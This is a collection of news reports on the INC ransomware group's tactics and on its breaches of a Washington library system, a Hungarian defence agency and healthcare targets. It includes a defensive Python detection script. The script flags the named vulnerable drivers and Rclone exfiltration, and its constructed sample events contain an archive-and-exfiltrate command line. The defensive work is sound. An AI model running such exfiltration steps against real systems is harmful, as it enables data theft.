
INC Ransomware Climbs Into Top Tier of Cybercrime Operations, Surpasses 830 Victims

The ransomware operation known as INC has grown into one of the most active cybercrime groups of 2026, with security researchers linking it to more than 830 victims since it first appeared in August 2023.

According to researchers at Acronis, the group's rise coincided with disruptions affecting major ransomware brands such as LockBit and BlackCat. As affiliates sought alternative platforms, INC appears to have benefited from that shift. More than 65% of the victims listed by the group are based in the United States, with legal firms, healthcare providers, manufacturers, construction companies, and technology organizations among the most frequently targeted sectors.

Researchers also observed major changes to the ransomware itself. INC's malware for Windows and Linux/VMware ESXi systems has been rewritten in Rust, a programming language increasingly adopted by malware developers because it supports multiple operating systems and can complicate reverse-engineering efforts.

The group's toolkit has expanded as well. Recent attacks have involved a credential-stealing utility capable of extracting authentication data from newer Veeam backup deployments that use salted DPAPI encryption. Access to backup infrastructure can give attackers valuable credentials while also making recovery efforts more difficult for victims.

Acronis noted that the sale of INC's Windows and Linux ransomware variants on underground cybercrime forums in May 2024 contributed to the appearance of related ransomware families, including Lynx and Sinobi. Researchers identified significant code similarities between the groups.

Investigators found that INC affiliates rely on several entry points to compromise networks, including spear-phishing campaigns, credentials purchased from Initial Access Brokers (IABs), and the exploitation of publicly exposed systems running vulnerable versions of Citrix NetScaler, Fortinet EMS, and SimpleHelp software.

Once inside a network, attackers harvest credentials, move between systems using legitimate administrative tools such as RDP and PsExec, and attempt to weaken security controls through a technique known as Bring Your Own Vulnerable Driver (BYOVD). Researchers observed the use of vulnerable drivers including filwfp.sys, filnk.sys, and fildds.sys. The group also deploys tools such as Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer to maintain access and control compromised environments.

Before encryption begins, stolen files are collected and transferred using Rclone, often after being packaged into password-protected archives. The ransomware then encrypts systems using multithreading and partial-encryption techniques to speed up the process. When launched against VMware ESXi environments, the malware can also attempt to shut down virtual machines.
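As an added defender-side example (not from the article or the Acronis research), the following Python sketch scans constructed endpoint events for two of the behaviours described above: loads of the named vulnerable drivers and Rclone runs that follow creation of a password-protected archive. The key=value event format, field names and sample values are constructed for this example, not any vendor's real log format.

```python
"""Detection sketch for two INC attack-chain behaviours described in the article:
BYOVD loads of the named drivers, and Rclone runs after a password-protected
archive is built. Event format and field names are assumptions of this example."""
import re

# Driver file names the researchers associated with INC's BYOVD activity.
INC_BYOVD_DRIVERS = {"filwfp.sys", "filnk.sys", "fildds.sys"}

# Constructed sample events: a benign driver load, a BYOVD load, an archive
# step and an Rclone transfer. Hostnames, paths and values are made up.
SAMPLE_EVENTS = [
    'host=FS01 event=driver_load image=C:\\Windows\\System32\\drivers\\tcpip.sys',
    'host=FS01 event=driver_load image=C:\\Users\\Public\\filwfp.sys',
    'host=FS01 event=process_create image=C:\\Tools\\7z.exe cmdline="7z a -pSecret!1 out.7z D:\\Finance"',
    'host=FS01 event=process_create image=C:\\Tools\\rclone.exe cmdline="rclone copy out.7z remote:bucket"',
]

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line: str) -> dict:
    """Turn one key=value line into a dict, stripping quotes from quoted values."""
    return {k: v.strip('"') for k, v in _KV.findall(line)}

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(lines):
    """Return (host, rule, detail) findings for the watched behaviours."""
    findings = []
    archive_seen = set()  # hosts where a password-protected archive was built
    for line in lines:
        ev = parse_event(line)
        host, image = ev.get("host", "?"), basename(ev.get("image", ""))
        if ev.get("event") == "driver_load" and image in INC_BYOVD_DRIVERS:
            findings.append((host, "byovd_driver_load", image))
        elif ev.get("event") == "process_create":
            cmd = ev.get("cmdline", "")
            # A 7-Zip style "-p<password>" switch marks a password-protected archive.
            if image == "7z.exe" and re.search(r"(^|\s)-p\S", cmd):
                archive_seen.add(host)
            elif image == "rclone.exe":
                rule = "rclone_after_archive" if host in archive_seen else "rclone_exec"
                findings.append((host, rule, cmd))
    return findings

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```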

Data from ZeroFox ranked INC as the fourth most active ransomware operation during the first quarter of 2026, recording more than 120 incidents. Researchers said the group's growth demonstrates how ransomware operators can build large-scale campaigns using widely available tools, stolen credentials, and unpatched systems rather than relying on highly specialized malware.

Pierce County Library System Data Breach Exposes Information of Over 340,000 People


A cyber attack on the Pierce County Library System in the state of Washington has compromised the personal data of more than 340,000 people, underscoring the rising cybersecurity threat to public services. The attack disrupted library services across the entire county and affected both library users and staff. The incident was made public through breach notification letters published on the Pierce County Library System's website.

According to the notification letters, the library system detected the intrusion on April 21 and shut down all of its systems in an effort to contain it. A subsequent investigation confirmed that a breach had taken place.

On May 12, the investigation confirmed that data belonging to patrons and staff had been exfiltrated. The attackers had access to the network from April 15 to April 21, during which time sensitive information was accessed and exfiltrated. The type of information exposed varied depending on the individual's relationship to the library.

For library patrons, the exposed data included names and dates of birth. Although far more limited than what was taken for employees, this information can still be used in identity-related fraud. Current and former employees of the library system were more seriously affected: their stolen data included Social Security numbers, financial account information, driver's license numbers, credit card numbers, passport information, health insurance details, and certain medical information.

The attack was later attributed to the INC ransomware gang, which was responsible for a number of highly damaging attacks on government bodies during 2025. The gang has previously attacked organizations such as the Office of the Attorney General of Pennsylvania and a nationwide emergency alert service used by local authorities. This is not the first such incident in Pierce County.

In 2023, Pierce County's public transit service, which carries 18,000 riders a day, was the victim of a ransomware attack. Public library networks have become a common target for ransomware in recent years: cybercriminals regard libraries as high-stakes targets because community members depend on them for internet access, catalog access, and other digital services, which can pressure an organization into paying a ransom to resume operations. National and city library networks across North America have been hit by such attacks.

The current threat environment has led to calls for targeted programs within the United States government to assess cybersecurity risks for libraries. This would involve improving the sharing of information about cyber attacks and providing libraries with more support and advanced services, such as firewall services tailored to their needs.

As libraries, like other government institutions, continue to digitize their services, a breach such as the one Pierce County experienced is a reminder that continued investment in cybersecurity is a necessity.

Hungarian Defence Agency Hacked: Foreign Hackers Breach IT Systems


Foreign hackers recently infiltrated the IT systems of Hungary’s Defence Procurement Agency, a government body responsible for managing the country’s military acquisitions. According to Gergely Gulyas, the chief of staff to Hungarian Prime Minister Viktor Orban, no sensitive military data related to Hungary’s national security or its military structure was compromised during the breach. Speaking at a press briefing, Gulyas confirmed that while some plans and procurement data may have been accessed, nothing that could significantly harm Hungary’s security was made public. The attackers, described as a “hostile foreign, non-state hacker group,” have not been officially identified by name. 

However, Hungarian news outlet Magyar Hang reported that a group known as INC Ransomware claimed responsibility for the breach. According to the outlet, the group accessed, encrypted, and reportedly published some files online, along with screenshots to demonstrate their access. The Hungarian government has refrained from confirming these details, citing an ongoing investigation to assess the breach’s scope and potential impact fully. Hungary, a NATO member state sharing a border with Ukraine, has been increasing its military investments since 2017 under a modernization and rearmament initiative. 

This program has seen the purchase of tanks, helicopters, air defense systems, and the establishment of a domestic military manufacturing industry. Among the notable projects is the production of Lynx infantry fighting vehicles by Germany’s Rheinmetall in Zalaegerszeg, a region in western Hungary. The ongoing conflict in Ukraine, which began with Russia’s 2022 invasion, has further driven Hungary to increase its defense spending. The government recently announced plans to allocate at least 2% of its GDP to military expenditures in 2024. Gulyas assured reporters that Hungary’s most critical military data remains secure. 

The Defence Procurement Agency itself does not handle sensitive information related to military operations or structural details, limiting the potential impact of the breach. The investigation aims to clarify whether the compromised files include any material that could pose broader risks to the nation’s defense strategy. The breach raises concerns about the cybersecurity measures protecting Hungary’s defense systems, particularly given the escalating reliance on advanced technology in modern military infrastructure. With ransomware attacks becoming increasingly sophisticated, governments and agencies globally are facing heightened pressure to bolster their cybersecurity defenses. 

Hungary’s response to this incident will likely involve a combination of intensified cybersecurity protocols and ongoing collaboration with NATO allies to mitigate similar threats in the future. As the investigation continues, the government is expected to release further updates about the breach’s scope and any additional preventive measures being implemented.

Vice Society Shifts to Inc Ransomware in Latest Healthcare Cyberattack


Ransomware incidents continue to rise, the latest being an attack on American healthcare institutions by a well-known cybercrime group.

Vice Society, tracked by Microsoft as Vanilla Tempest, has been active since July 2022. This Russian-speaking group has used a variety of ransomware strains in its double extortion operations, including BlackCat, Hello Kitty, Quantum Locker, Rhysida, Zeppelin (including a custom version), and its own proprietary ransomware.

In a series of updates on X, the Microsoft Threat Intelligence Center (MSTIC) highlighted the group's latest weapon: Inc ransomware.

"Vanilla Tempest is one of the most active ransomware operators that MSTIC monitors," said Jeremy Dallman, MSTIC's senior director of threat intelligence. "While they have been targeting healthcare for some time, their recent adoption of the Inc ransomware payload marks a significant shift as they increasingly engage with the broader ransomware-as-a-service (RaaS) ecosystem."

Although Vice Society targets multiple industries, including IT and manufacturing, it is primarily known for its campaigns against education and healthcare. This aligns with broader cybersecurity trends. According to Check Point Research, healthcare remains the most frequently targeted sector by ransomware. In fact, healthcare organizations worldwide face an average of 2,018 attacks per week, representing a 32% increase compared to the previous year.

Cindi Carter, Check Point's CISO for the Americas, explains the appeal to cybercriminals. "Healthcare organizations are often plagued by outdated legacy technology and bureaucratic hurdles, making them easy targets. Additionally, the data these organizations collect is highly valuable," she states. "A medical record is one of the most identifiable pieces of digital information about a person, second only to a fingerprint."

In its recent healthcare exploits, Vice Society gained initial access through systems already compromised by the Gootloader backdoor. The group subsequently deployed tools such as the Supper backdoor, AnyDesk’s remote monitoring software, and MEGA’s data synchronization service—both legitimate products. They utilized Remote Desktop Protocol (RDP) for lateral movement and exploited Windows Management Instrumentation (WMI) to drop Inc ransomware within infected networks.

Inc ransomware has been operational since last summer, making headlines for attacking large organizations, including Xerox and Scotland's National Health Service (NHS). Jason Baker, a threat intelligence consultant with GuidePoint Security, notes that the organized nature of Inc ransomware affiliates sets them apart.

"The most distinct aspect of Inc affiliates is their systematic approach during the negotiation process," Baker says, drawing from his own experiences. "They don’t make off-the-cuff remarks or resort to empty threats. Everything is methodical."

Baker likens it to the difference between a well-planned bank robbery and a spontaneous street mugging. "You can tell when someone has put serious thought into their attack and knows exactly what they're doing," he adds.

According to a report from Dark Reading, Inc’s malware recently leaked details about its encryption methods, potentially giving defenders an advantage. However, Baker warns that the reality is far more nuanced, especially in the healthcare sector.

"If an organization realizes it can recover data without needing a decryptor, it reduces their incentive to pay the ransom," he explains. "But the situation becomes more complex in double extortion scenarios, especially when sensitive personally identifiable health information (PHI) or intellectual property is involved. That’s why double extortion remains effective—it adds pressure, even if recovery is possible."